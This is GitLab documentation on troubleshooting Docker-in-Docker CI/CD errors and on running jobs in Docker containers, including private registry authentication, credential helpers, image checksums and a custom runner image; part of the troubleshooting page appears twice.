To allow service resolution and access, add an explicit alias for the service name `docker`: ```yaml default: image: docker:24.0.5 services: - name: registry.hub.docker.com/library/docker:24.0.5-dind alias: docker ``` ## Error: `Cannot connect to the Docker daemon at unix:///var/run/docker.sock` You might get the following error when trying to run a `docker` command to access a `dind` service: ```shell $ docker ps Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running? ``` Make sure your job has defined these environment variables: - `DOCKER_HOST` - `DOCKER_TLS_CERTDIR` (optional) - `DOCKER_TLS_VERIFY` (optional) You may also want to update the image that provides the Docker client. For example, the [`docker/compose` images are obsolete](https://hub.docker.com/r/docker/compose) and should be replaced with [`docker`](https://hub.docker.com/_/docker). As described in [runner issue 30944](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/30944#note_1514250909), this error can happen if your job previously relied on environment variables derived from the deprecated [Docker `--link` parameter](https://docs.docker.com/network/links/#environment-variables), such as `DOCKER_PORT_2375_TCP`. Your job fails with this error if: - Your CI/CD image relies on a legacy variable, such as `DOCKER_PORT_2375_TCP`. - The [runner feature flag `FF_NETWORK_PER_BUILD`](https://docs.gitlab.com/runner/configuration/feature-flags.html) is set to `true`. - `DOCKER_HOST` is not explicitly set. ## Error: `unauthorized: incorrect username or password` This error appears when you use the deprecated variable, `CI_BUILD_TOKEN`: ```plaintext Error response from daemon: Get "https://registry-1.docker.io/v2/": unauthorized: incorrect username or password ``` To prevent users from receiving this error, you should: - Use [CI_JOB_TOKEN](../jobs/ci_job_token.md) instead. - Change from `gitlab-ci-token/CI_BUILD_TOKEN` to `$CI_REGISTRY_USER/$CI_REGISTRY_PASSWORD`. 
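For example, a registry login that follows this recommendation might look like the following illustrative job fragment:

```yaml
# Sketch: authenticate with the predefined registry credentials instead of
# the deprecated gitlab-ci-token/CI_BUILD_TOKEN pair. CI_REGISTRY_USER and
# CI_REGISTRY_PASSWORD are predefined CI/CD variables.
before_script:
  - echo "$CI_REGISTRY_PASSWORD" | docker login -u "$CI_REGISTRY_USER" --password-stdin "$CI_REGISTRY"
```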
## Error during connect: `no such host` This error appears when the `dind` service has failed to start: ```plaintext error during connect: Post "https://docker:2376/v1.24/auth": dial tcp: lookup docker on 127.0.0.11:53: no such host ``` Check the job log to see if `mount: permission denied (are you root?)` appears. For example: ```plaintext Service container logs: 2023-08-01T16:04:09.541703572Z Certificate request self-signature ok 2023-08-01T16:04:09.541770852Z subject=CN = docker:dind server 2023-08-01T16:04:09.556183222Z /certs/server/cert.pem: OK 2023-08-01T16:04:10.641128729Z Certificate request self-signature ok 2023-08-01T16:04:10.641173149Z subject=CN = docker:dind client 2023-08-01T16:04:10.656089908Z /certs/client/cert.pem: OK 2023-08-01T16:04:10.659571093Z ip: can't find device 'ip_tables' 2023-08-01T16:04:10.660872131Z modprobe: can't change directory to '/lib/modules': No such file or directory 2023-08-01T16:04:10.664620455Z mount: permission denied (are you root?) 2023-08-01T16:04:10.664692175Z Could not mount /sys/kernel/security. 2023-08-01T16:04:10.664703615Z AppArmor detection and --privileged mode might break. 2023-08-01T16:04:10.665952353Z mount: permission denied (are you root?) ``` This indicates the GitLab Runner does not have permission to start the `dind` service: 1. Check that `privileged = true` is set in the `config.toml`. 1. Make sure the CI job has the right Runner tags to use these privileged runners. ## Error: `cgroups: cgroup mountpoint does not exist: unknown` There is a known incompatibility introduced by Docker Engine 20.10. When the host uses Docker Engine 20.10 or later, then the `docker:dind` service in a version older than 20.10 does not work as expected. 
While the service itself will start without problems, trying to build the container image results in the error:

```plaintext
cgroups: cgroup mountpoint does not exist: unknown
```

To resolve this issue, update the `docker:dind` container to at least version 20.10, for example `docker:24.0.5-dind`.

The opposite configuration (`docker:24.0.5-dind` service and Docker Engine on the host in version 19.03.x or older) works without problems. As a best practice, you should frequently test and update your job environment versions to the newest available. This brings new features and improved security, and, in this specific case, makes upgrades of the underlying Docker Engine on the runner's host transparent for the job.

## Error: `failed to verify certificate: x509: certificate signed by unknown authority`

This error can appear when Docker commands like `docker build` or `docker pull` are executed in a Docker-in-Docker environment where custom or private certificates are used (for example, Zscaler certificates):

```plaintext
error pulling image configuration: download failed after attempts=6: tls: failed to verify certificate: x509: certificate signed by unknown authority
```

This error occurs because Docker commands in a Docker-in-Docker environment use two separate containers:

- The **build container** runs the Docker client (`/usr/bin/docker`) and executes your job's script commands.
- The **service container** (often named `svc`) runs the Docker daemon that processes most Docker commands.

When your organization uses custom certificates, both containers need these certificates. Without proper certificate configuration in both containers, Docker operations that connect to external registries or services will fail with certificate errors.

To resolve this issue:

1. Store your root certificate as a [CI/CD variable](../variables/_index.md#define-a-cicd-variable-in-the-ui) named `CA_CERTIFICATE`.
The certificate should be in this format: ```plaintext -----BEGIN CERTIFICATE----- (certificate content) -----END CERTIFICATE----- ``` 1. Configure your pipeline to install the certificate in the service container before starting the Docker daemon. For example: ```yaml image_build: stage: build image: name: docker:19.03 variables: DOCKER_HOST: tcp://localhost:2375 DOCKER_TLS_CERTDIR: "" CA_CERTIFICATE: "$CA_CERTIFICATE" services: - name: docker:19.03-dind command: - /bin/sh - -c - | echo "$CA_CERTIFICATE" > /usr/local/share/ca-certificates/custom-ca.crt && \ update-ca-certificates && \ dockerd-entrypoint.sh || exit script: - docker info - docker login -u $DOCKER_USERNAME -p $DOCKER_PASSWORD $DOCKER_REGISTRY - docker build -t "${DOCKER_REGISTRY}/my-app:${CI_COMMIT_REF_NAME}" . - docker push "${DOCKER_REGISTRY}/my-app:${CI_COMMIT_REF_NAME}" ```
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Troubleshooting Docker Build breadcrumbs: - doc - ci - docker --- ## Error: `docker: Cannot connect to the Docker daemon at tcp://docker:2375` This error is common when you are using [Docker-in-Docker](using_docker_build.md#use-docker-in-docker) v19.03 or later: ```plaintext docker: Cannot connect to the Docker daemon at tcp://docker:2375. Is the docker daemon running? ``` This error occurs because Docker starts on TLS automatically. - If this is your first time setting it up, see [use the Docker executor with the Docker image](using_docker_build.md#use-docker-in-docker). - If you are upgrading from v18.09 or earlier, see the [upgrade guide](https://about.gitlab.com/blog/2019/07/31/docker-in-docker-with-docker-19-dot-03/). This error can also occur with the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/#using-dockerdind) when attempts are made to access the Docker-in-Docker service before it has fully started up. For a more detailed explanation, see [issue 27215](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/27215). ## Docker `no such host` error You might get an error that says `docker: error during connect: Post https://docker:2376/v1.40/containers/create: dial tcp: lookup docker on x.x.x.x:53: no such host`. This issue can occur when the service's image name [includes a registry hostname](../services/_index.md#available-settings-for-services). For example: ```yaml default: image: docker:24.0.5 services: - registry.hub.docker.com/library/docker:24.0.5-dind ``` A service's hostname is [derived from the full image name](../services/_index.md#accessing-the-services). However, the shorter service hostname `docker` is expected. 
To allow service resolution and access, add an explicit alias for the service name `docker`: ```yaml default: image: docker:24.0.5 services: - name: registry.hub.docker.com/library/docker:24.0.5-dind alias: docker ``` ## Error: `Cannot connect to the Docker daemon at unix:///var/run/docker.sock` You might get the following error when trying to run a `docker` command to access a `dind` service: ```shell $ docker ps Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running? ``` Make sure your job has defined these environment variables: - `DOCKER_HOST` - `DOCKER_TLS_CERTDIR` (optional) - `DOCKER_TLS_VERIFY` (optional) You may also want to update the image that provides the Docker client. For example, the [`docker/compose` images are obsolete](https://hub.docker.com/r/docker/compose) and should be replaced with [`docker`](https://hub.docker.com/_/docker). As described in [runner issue 30944](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/30944#note_1514250909), this error can happen if your job previously relied on environment variables derived from the deprecated [Docker `--link` parameter](https://docs.docker.com/network/links/#environment-variables), such as `DOCKER_PORT_2375_TCP`. Your job fails with this error if: - Your CI/CD image relies on a legacy variable, such as `DOCKER_PORT_2375_TCP`. - The [runner feature flag `FF_NETWORK_PER_BUILD`](https://docs.gitlab.com/runner/configuration/feature-flags.html) is set to `true`. - `DOCKER_HOST` is not explicitly set. ## Error: `unauthorized: incorrect username or password` This error appears when you use the deprecated variable, `CI_BUILD_TOKEN`: ```plaintext Error response from daemon: Get "https://registry-1.docker.io/v2/": unauthorized: incorrect username or password ``` To prevent users from receiving this error, you should: - Use [CI_JOB_TOKEN](../jobs/ci_job_token.md) instead. - Change from `gitlab-ci-token/CI_BUILD_TOKEN` to `$CI_REGISTRY_USER/$CI_REGISTRY_PASSWORD`. 
## Error during connect: `no such host`

This error appears when the `dind` service has failed to start:

```plaintext
error during connect: Post "https://docker:2376/v1.24/auth": dial tcp: lookup docker on 127.0.0.11:53: no such host
```

Check the job log to see if `mount: permission denied (are you root?)` appears. For example:

```plaintext
Service container logs:
2023-08-01T16:04:09.541703572Z Certificate request self-signature ok
2023-08-01T16:04:09.541770852Z subject=CN = docker:dind server
2023-08-01T16:04:09.556183222Z /certs/server/cert.pem: OK
2023-08-01T16:04:10.641128729Z Certificate request self-signature ok
2023-08-01T16:04:10.641173149Z subject=CN = docker:dind client
2023-08-01T16:04:10.656089908Z /certs/client/cert.pem: OK
2023-08-01T16:04:10.659571093Z ip: can't find device 'ip_tables'
2023-08-01T16:04:10.660872131Z modprobe: can't change directory to '/lib/modules': No such file or directory
2023-08-01T16:04:10.664620455Z mount: permission denied (are you root?)
2023-08-01T16:04:10.664692175Z Could not mount /sys/kernel/security.
2023-08-01T16:04:10.664703615Z AppArmor detection and --privileged mode might break.
2023-08-01T16:04:10.665952353Z mount: permission denied (are you root?)
```

This error indicates that GitLab Runner does not have permission to start the `dind` service:

1. Check that `privileged = true` is set in the `config.toml`.
1. Make sure the CI/CD job has the runner tags required to use these privileged runners.

## Error: `cgroups: cgroup mountpoint does not exist: unknown`

There is a known incompatibility introduced by Docker Engine 20.10.

When the host uses Docker Engine 20.10 or later, a `docker:dind` service in a version older than 20.10 does not work as expected.
While the service itself starts without problems, trying to build the container image results in the error:

```plaintext
cgroups: cgroup mountpoint does not exist: unknown
```

To resolve this issue, update the `docker:dind` container to at least version 20.10, for example `docker:24.0.5-dind`.

The opposite configuration (a `docker:24.0.5-dind` service with Docker Engine 19.03.x or older on the host) works without problems.

As a best practice, you should frequently test and update your job environment to the newest versions. This brings new features and improved security, and, in this specific case, makes upgrades of the underlying Docker Engine on the runner's host transparent to the job.

## Error: `failed to verify certificate: x509: certificate signed by unknown authority`

This error can appear when Docker commands like `docker build` or `docker pull` are executed in a Docker-in-Docker environment where custom or private certificates are used (for example, Zscaler certificates):

```plaintext
error pulling image configuration: download failed after attempts=6: tls: failed to verify certificate: x509: certificate signed by unknown authority
```

This error occurs because Docker commands in a Docker-in-Docker environment use two separate containers:

- The **build container** runs the Docker client (`/usr/bin/docker`) and executes your job's script commands.
- The **service container** (often named `svc`) runs the Docker daemon that processes most Docker commands.

When your organization uses custom certificates, both containers need these certificates. Without proper certificate configuration in both containers, Docker operations that connect to external registries or services fail with certificate errors.

To resolve this issue:

1. Store your root certificate as a [CI/CD variable](../variables/_index.md#define-a-cicd-variable-in-the-ui) named `CA_CERTIFICATE`.
The certificate should be in this format: ```plaintext -----BEGIN CERTIFICATE----- (certificate content) -----END CERTIFICATE----- ``` 1. Configure your pipeline to install the certificate in the service container before starting the Docker daemon. For example: ```yaml image_build: stage: build image: name: docker:19.03 variables: DOCKER_HOST: tcp://localhost:2375 DOCKER_TLS_CERTDIR: "" CA_CERTIFICATE: "$CA_CERTIFICATE" services: - name: docker:19.03-dind command: - /bin/sh - -c - | echo "$CA_CERTIFICATE" > /usr/local/share/ca-certificates/custom-ca.crt && \ update-ca-certificates && \ dockerd-entrypoint.sh || exit script: - docker info - docker login -u $DOCKER_USERNAME -p $DOCKER_PASSWORD $DOCKER_REGISTRY - docker build -t "${DOCKER_REGISTRY}/my-app:${CI_COMMIT_REF_NAME}" . - docker push "${DOCKER_REGISTRY}/my-app:${CI_COMMIT_REF_NAME}" ```
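The example above installs the certificate only in the service container. Because the build container runs the Docker client and your script commands, it may also need the certificate. A hedged sketch of the equivalent client-side step, which is not part of the official example and assumes the job image is Debian- or Alpine-based with `update-ca-certificates` available:

```yaml
image_build:
  before_script:
    # Install the same root certificate in the build container so the
    # Docker client and other script commands trust it too.
    - echo "$CA_CERTIFICATE" > /usr/local/share/ca-certificates/custom-ca.crt
    - update-ca-certificates
```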
---
stage: Verify
group: Runner
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
description: Learn how to run your CI/CD jobs in Docker containers hosted on dedicated CI/CD build servers or your local machine.
title: Run your CI/CD jobs in Docker containers
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

You can run your CI/CD jobs in Docker containers hosted on dedicated CI/CD build servers or your local machine.

To run CI/CD jobs in a Docker container, you need to:

1. Register a runner and configure it to use the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html).
1. Specify the container image where you want to run the CI/CD jobs in the `.gitlab-ci.yml` file.
1. Optional. Run other services, like MySQL, in containers. Do this by specifying [services](../services/_index.md) in your `.gitlab-ci.yml` file.

## Register a runner that uses the Docker executor

To use GitLab Runner with Docker you need to [register a runner](https://docs.gitlab.com/runner/register/) that uses the Docker executor.

This example shows how to set up a temporary template to supply services:

```shell
cat > /tmp/test-config.template.toml << EOF
[[runners]]
  [runners.docker]
    [[runners.docker.services]]
      name = "postgres:latest"
    [[runners.docker.services]]
      name = "mysql:latest"
EOF
```

Then use this template to register the runner:

```shell
sudo gitlab-runner register \
  --url "https://gitlab.example.com/" \
  --token "$RUNNER_TOKEN" \
  --description "docker-ruby:3.3" \
  --executor "docker" \
  --template-config /tmp/test-config.template.toml \
  --docker-image ruby:3.3
```

The registered runner uses the `ruby:3.3` Docker image and runs two services, `postgres:latest` and `mysql:latest`, both of which are accessible during the build process.

## What is an image

The `image` keyword is the name of the Docker image the Docker executor uses to run CI/CD jobs.

By default, the executor pulls images from [Docker Hub](https://hub.docker.com/). However, you can configure the registry location in the `gitlab-runner/config.toml` file.
For example, you can set the [Docker pull policy](https://docs.gitlab.com/runner/executors/docker.html#how-pull-policies-work) to use local images. For more information about images and Docker Hub, see the [Docker overview](https://docs.docker.com/get-started/overview/). ## Image requirements Any image used to run a CI/CD job must have the following applications installed: - `sh` or `bash` - `grep` ## Define `image` in the `.gitlab-ci.yml` file You can define an image that's used for all jobs, and a list of services that you want to use during runtime: ```yaml default: image: ruby:2.6 services: - postgres:11.7 before_script: - bundle install test: script: - bundle exec rake spec ``` The image name must be in one of the following formats: - `image: <image-name>` (Same as using `<image-name>` with the `latest` tag) - `image: <image-name>:<tag>` - `image: <image-name>@<digest>` ## Extended Docker configuration options {{< history >}} - Introduced in GitLab and GitLab Runner 9.4. {{< /history >}} You can use a string or a map for the `image` or `services` entries: - Strings must include the full image name (including the registry, if you want to download the image from a registry other than Docker Hub). - Maps must contain at least the `name` option, which is the same image name as used for the string setting. For example, the following two definitions are equal: - A string for `image` and `services`: ```yaml image: "registry.example.com/my/image:latest" services: - postgresql:14.3 - redis:latest ``` - A map for `image` and `services`. The `image:name` is required: ```yaml image: name: "registry.example.com/my/image:latest" services: - name: postgresql:14.3 - name: redis:latest ``` ## Where scripts are executed When a CI job runs in a Docker container, the `before_script`, `script`, and `after_script` commands run in the `/builds/<project-path>/` directory. Your image may have a different default `WORKDIR` defined. 
To move to your `WORKDIR`, save the `WORKDIR` as an environment variable so you can reference it in the container during the job's runtime.

### Override the entrypoint of an image

{{< history >}}

- Introduced in GitLab and GitLab Runner 9.4. Read more about the [extended configuration options](using_docker_images.md#extended-docker-configuration-options).

{{< /history >}}

Before explaining the available entrypoint override methods, let's describe how the runner starts. It uses a Docker image for the containers used in the CI/CD jobs:

1. The runner starts a Docker container using the defined entrypoint. By default, this is the entrypoint defined in the `Dockerfile`, which may be overridden in the `.gitlab-ci.yml` file.
1. The runner attaches itself to a running container.
1. The runner prepares a script (the combination of [`before_script`](../yaml/_index.md#before_script), [`script`](../yaml/_index.md#script), and [`after_script`](../yaml/_index.md#after_script)).
1. The runner sends the script to the container's shell `stdin` and receives the output.

To override the [entrypoint](https://docs.gitlab.com/runner/executors/docker.html#configure-a-docker-entrypoint) of a Docker image, in the `.gitlab-ci.yml` file:

- For Docker 17.06 and later, set `entrypoint` to an empty value.
- For Docker 17.03 and earlier, set `entrypoint` to `/bin/sh -c`, `/bin/bash -c`, or an equivalent shell available in the image.

The syntax of `image:entrypoint` is similar to [Dockerfile `ENTRYPOINT`](https://docs.docker.com/reference/dockerfile/#entrypoint).

Let's assume you have a `super/sql:experimental` image with a SQL database in it. You want to use it as a base image for your job because you want to execute some tests with this database binary. Let's also assume that this image is configured with `/usr/bin/super-sql run` as an entrypoint. When the container starts without additional options, it runs the database's process.
The runner expects that the image has no entrypoint or that the entrypoint is prepared to start a shell command. With the extended Docker configuration options, instead of: - Creating your own image based on `super/sql:experimental`. - Setting the `ENTRYPOINT` to a shell. - Using the new image in your CI job. You can now define an `entrypoint` in the `.gitlab-ci.yml` file. **For Docker 17.06 and later**: ```yaml image: name: super/sql:experimental entrypoint: [""] ``` **For Docker 17.03 and earlier**: ```yaml image: name: super/sql:experimental entrypoint: ["/bin/sh", "-c"] ``` ## Define image and services in `config.toml` In the `config.toml` file, you can define: - In the [`[runners.docker]`](https://docs.gitlab.com/runner/configuration/advanced-configuration#the-runnersdocker-section) section, the container image used to run CI/CD jobs - In the [`[[runners.docker.services]]`](https://docs.gitlab.com/runner/configuration/advanced-configuration#the-runnersdockerservices-section) section, the [services](../services/_index.md) container ```toml [runners.docker] image = "ruby:latest" services = ["mysql:latest", "postgres:latest"] ``` The image and services defined this way are added to all jobs run by that runner. ## Access an image from a private container registry To access private container registries, the GitLab Runner process can use: - [Statically defined credentials](#use-statically-defined-credentials). A username and password for a specific registry. - [Credentials Store](#use-a-credentials-store). For more information, see [the relevant Docker documentation](https://docs.docker.com/reference/cli/docker/login/#credential-stores). - [Credential Helpers](#use-credential-helpers). For more information, see [the relevant Docker documentation](https://docs.docker.com/reference/cli/docker/login/#credential-helpers). 
When you use the [GitLab Container Registry](../../user/packages/container_registry/_index.md) on the same GitLab instance, GitLab provides default credentials for this registry. With these credentials, the `CI_JOB_TOKEN` is used for authentication. To use the job token, the user starting the job must have at least the Developer role for the project where the private image is hosted. The project hosting the private image must also allow the other project to authenticate with the job token. This access is disabled by default. For more details, see [CI/CD job token](../jobs/ci_job_token.md#control-job-token-access-to-your-project). To define which option should be used, the runner process reads the configuration in this order: - A `DOCKER_AUTH_CONFIG` [CI/CD variable](../variables/_index.md). - A `DOCKER_AUTH_CONFIG` environment variable set in the runner's `config.toml` file. - A `config.json` file in `$HOME/.docker` directory of the user running the process. If the `--user` flag is provided to run the child processes as unprivileged user, the home directory of the main runner process user is used. ### Requirements and limitations - [Credentials Store](#use-a-credentials-store) and [Credential Helpers](#use-credential-helpers) require binaries to be added to the GitLab Runner `$PATH`, and require access to do so. Therefore, these features are not available on instance runners, or any other runner where the user does not have access to the environment where the runner is installed. ### Use statically-defined credentials You can access a private registry using two approaches. Both require setting the CI/CD variable `DOCKER_AUTH_CONFIG` with appropriate authentication information. 1. Per-job: To configure one job to access a private registry, add `DOCKER_AUTH_CONFIG` as a [CI/CD variable](../variables/_index.md). 1. 
Per-runner: To configure a runner so all its jobs can access a private registry, add `DOCKER_AUTH_CONFIG` as an environment variable in the runner's configuration. See the following sections for examples of each. #### Determine your `DOCKER_AUTH_CONFIG` data As an example, let's assume you want to use the `registry.example.com:5000/private/image:latest` image. This image is private and requires you to sign in to a private container registry. Let's also assume that these are the sign-in credentials: | Key | Value | |:---------|:------| | registry | `registry.example.com:5000` | | username | `my_username` | | password | `my_password` | Use one of the following methods to determine the value for `DOCKER_AUTH_CONFIG`: - Do a `docker login` on your local machine: ```shell docker login registry.example.com:5000 --username my_username --password my_password ``` Then copy the content of `~/.docker/config.json`. If you don't need access to the registry from your computer, you can do a `docker logout`: ```shell docker logout registry.example.com:5000 ``` - In some setups, it's possible the Docker client uses the available system key store to store the result of `docker login`. In that case, it's impossible to read `~/.docker/config.json`, so you must prepare the required base64-encoded version of `${username}:${password}` and create the Docker configuration JSON manually. Open a terminal and execute the following command: ```shell # The use of printf (as opposed to echo) prevents encoding a newline in the password. printf "my_username:my_password" | openssl base64 -A # Example output to copy bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ= ``` {{< alert type="note" >}} If your username includes special characters like `@`, you must escape them with a backslash (` \ `) to prevent authentication problems. 
{{< /alert >}} Create the Docker JSON configuration content as follows: ```json { "auths": { "registry.example.com:5000": { "auth": "(Base64 content from above)" } } } ``` #### Configure a job To configure a single job with access for `registry.example.com:5000`, follow these steps: 1. Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: ```json { "auths": { "registry.example.com:5000": { "auth": "bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=" } } } ``` 1. You can now use any private image from `registry.example.com:5000` defined in `image` or `services` in your `.gitlab-ci.yml` file: ```yaml image: registry.example.com:5000/namespace/image:tag ``` In the previous example, GitLab Runner looks at `registry.example.com:5000` for the image `namespace/image:tag`. You can add configuration for as many registries as you want, adding more registries to the `"auths"` hash as described previously. The full `hostname:port` combination is required everywhere for the runner to match the `DOCKER_AUTH_CONFIG`. For example, if `registry.example.com:5000/namespace/image:tag` is specified in the `.gitlab-ci.yml` file, then the `DOCKER_AUTH_CONFIG` must also specify `registry.example.com:5000`. Specifying only `registry.example.com` does not work. ### Configuring a runner If you have many pipelines that access the same registry, you should set up registry access at the runner level. This allows pipeline authors to have access to a private registry just by running a job on the appropriate runner. It also helps simplify registry changes and credential rotations. This means that any job on that runner can access the registry with the same privilege, even across projects. If you need to control access to the registry, you need to be sure to control access to the runner. To add `DOCKER_AUTH_CONFIG` to a runner: 1. 
Modify the runner's `config.toml` file as follows: ```toml [[runners]] environment = ["DOCKER_AUTH_CONFIG={\"auths\":{\"registry.example.com:5000\":{\"auth\":\"bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=\"}}}"] ``` - The double quotes included in the `DOCKER_AUTH_CONFIG` data must be escaped with backslashes. This prevents them from being interpreted as TOML. - The `environment` option is a list. Your runner may have existing entries and you should add this to the list, not replace it. 1. Restart the runner service. ### Use a Credentials Store To configure a Credentials Store: 1. To use a Credentials Store, you need an external helper program to interact with a specific keychain or external store. Make sure the helper program is available in the GitLab Runner `$PATH`. 1. Make GitLab Runner use it. You can accomplish this by using one of the following options: - Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: ```json { "credsStore": "osxkeychain" } ``` - Or, if you're running self-managed runners, add the JSON to `${GITLAB_RUNNER_HOME}/.docker/config.json`. GitLab Runner reads this configuration file and uses the needed helper for this specific repository. `credsStore` is used to access **all** the registries. If you use both images from a private registry and public images from Docker Hub, pulling from Docker Hub fails. Docker daemon tries to use the same credentials for **all** the registries. ### Use Credential Helpers As an example, let's assume that you want to use the `<aws_account_id>.dkr.ecr.<region>.amazonaws.com/private/image:latest` image. This image is private and requires you to sign in to a private container registry. To configure access for `<aws_account_id>.dkr.ecr.<region>.amazonaws.com`, follow these steps: 1. Make sure [`docker-credential-ecr-login`](https://github.com/awslabs/amazon-ecr-credential-helper) is available in the GitLab Runner `$PATH`. 1. 
Have any of the following [AWS credentials setup](https://github.com/awslabs/amazon-ecr-credential-helper#aws-credentials). Make sure that GitLab Runner can access the credentials. 1. Make GitLab Runner use it. You can accomplish this by using one of the following options: - Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: ```json { "credHelpers": { "<aws_account_id>.dkr.ecr.<region>.amazonaws.com": "ecr-login" } } ``` This configures Docker to use the Credential Helper for a specific registry. Instead, you can configure Docker to use the Credential Helper for all Amazon Elastic Container Registry (ECR) registries: ```json { "credsStore": "ecr-login" } ``` {{< alert type="note" >}} If you use `{"credsStore": "ecr-login"}`, set the region explicitly in the AWS shared configuration file (`~/.aws/config`). The region must be specified when the ECR Credential Helper retrieves the authorization token. {{< /alert >}} - Or, if you're running self-managed runners, add the previous JSON to `${GITLAB_RUNNER_HOME}/.docker/config.json`. GitLab Runner reads this configuration file and uses the needed helper for this specific repository. 1. You can now use any private image from `<aws_account_id>.dkr.ecr.<region>.amazonaws.com` defined in `image` and/or `services` in your `.gitlab-ci.yml` file: ```yaml image: <aws_account_id>.dkr.ecr.<region>.amazonaws.com/private/image:latest ``` In the example, GitLab Runner looks at `<aws_account_id>.dkr.ecr.<region>.amazonaws.com` for the image `private/image:latest`. You can add configuration for as many registries as you want, adding more registries to the `"credHelpers"` hash. ### Use checksum to keep your image secure Use the image checksum in your job definition in your `.gitlab-ci.yml` file to verify the integrity of the image. A failed image integrity verification prevents you from using a modified container. 
To use the image checksum, append the checksum to the image name:

```yaml
image: ruby:2.6.8@sha256:d1dbaf9665fe8b2175198e49438092fdbcf4d8934200942b94425301b17853c7
```

To get the image checksum, on the image `TAG` tab, view the `DIGEST` column. For example, view the [Ruby image](https://hub.docker.com/_/ruby?tab=tags). The checksum is a random string, like `6155f0235e95`.

You can also get the checksum of any image on your system with the command `docker images --digests`:

```shell
❯ docker images --digests
REPOSITORY             TAG      DIGEST                                                                    (...)
gitlab/gitlab-ee       latest   sha256:723aa6edd8f122d50cae490b1743a616d54d4a910db892314d68470cc39dfb24   (...)
gitlab/gitlab-runner   latest   sha256:4a18a80f5be5df44cb7575f6b89d1fdda343297c6fd666c015c0e778b276e726   (...)
```

## Creating a Custom GitLab Runner Docker Image

You can create a custom GitLab Runner Docker image to package AWS CLI and Amazon ECR Credential Helper. This setup facilitates secure and streamlined interactions with AWS services, especially for containerized applications. For example, use this setup to manage, deploy, and update Docker images on Amazon ECR. This setup helps avoid time-consuming, error-prone configurations, and manual credential management.

1. [Authenticate GitLab with AWS](../cloud_deployment/_index.md#authenticate-gitlab-with-aws).
1.
Create a `Dockerfile` with the following content: ```Dockerfile # Control package versions ARG GITLAB_RUNNER_VERSION=v17.3.0 ARG AWS_CLI_VERSION=2.17.36 # AWS CLI and Amazon ECR Credential Helper FROM amazonlinux as aws-tools RUN set -e \ && yum update -y \ && yum install -y --allowerasing git make gcc curl unzip \ && curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" --output "awscliv2.zip" \ && unzip awscliv2.zip && ./aws/install -i /usr/local/bin \ && yum clean all # Download and install ECR Credential Helper RUN curl --location --output /usr/local/bin/docker-credential-ecr-login "https://github.com/awslabs/amazon-ecr-credential-helper/releases/latest/download/docker-credential-ecr-login-linux-amd64" RUN chmod +x /usr/local/bin/docker-credential-ecr-login # Configure the ECR Credential Helper RUN mkdir -p /root/.docker RUN echo '{ "credsStore": "ecr-login" }' > /root/.docker/config.json # Final image based on GitLab Runner FROM gitlab/gitlab-runner:${GITLAB_RUNNER_VERSION} # Install necessary packages RUN apt-get update \ && apt-get install -y --no-install-recommends jq procps curl unzip groff libgcrypt20 tar gzip less openssh-client \ && apt-get clean && rm -rf /var/lib/apt/lists/* # Copy AWS CLI and Amazon ECR Credential Helper binaries COPY --from=aws-tools /usr/local/bin/ /usr/local/bin/ # Copy ECR Credential Helper Configuration COPY --from=aws-tools /root/.docker/config.json /root/.docker/config.json ``` 1. To build the custom GitLab Runner Docker image in a `.gitlab-ci.yml`, include the following example: ```yaml variables: DOCKER_DRIVER: overlay2 IMAGE_NAME: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_NAME GITLAB_RUNNER_VERSION: v17.3.0 AWS_CLI_VERSION: 2.17.36 stages: - build build-image: stage: build script: - echo "Logging into GitLab container registry..." - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - echo "Building Docker image..." 
- docker build --build-arg GITLAB_RUNNER_VERSION=${GITLAB_RUNNER_VERSION} --build-arg AWS_CLI_VERSION=${AWS_CLI_VERSION} -t ${IMAGE_NAME} . - echo "Pushing Docker image to GitLab container registry..." - docker push ${IMAGE_NAME} rules: - changes: - Dockerfile ``` 1. [Register the runner](https://docs.gitlab.com/runner/register/#docker).
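Once registered, a job can target the custom runner, whose baked-in ECR Credential Helper lets it pull private ECR images. A minimal sketch, where the `aws-runner` tag and the job name are hypothetical and the image path uses the same placeholders as above:

```yaml
deploy:
  tags:
    - aws-runner   # hypothetical tag assigned to the custom runner
  # The runner's /root/.docker/config.json ({"credsStore": "ecr-login"})
  # supplies the credentials needed to pull this private image.
  image: <aws_account_id>.dkr.ecr.<region>.amazonaws.com/private/image:latest
  script:
    - echo "Running inside a private ECR image pulled by the custom runner"
```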
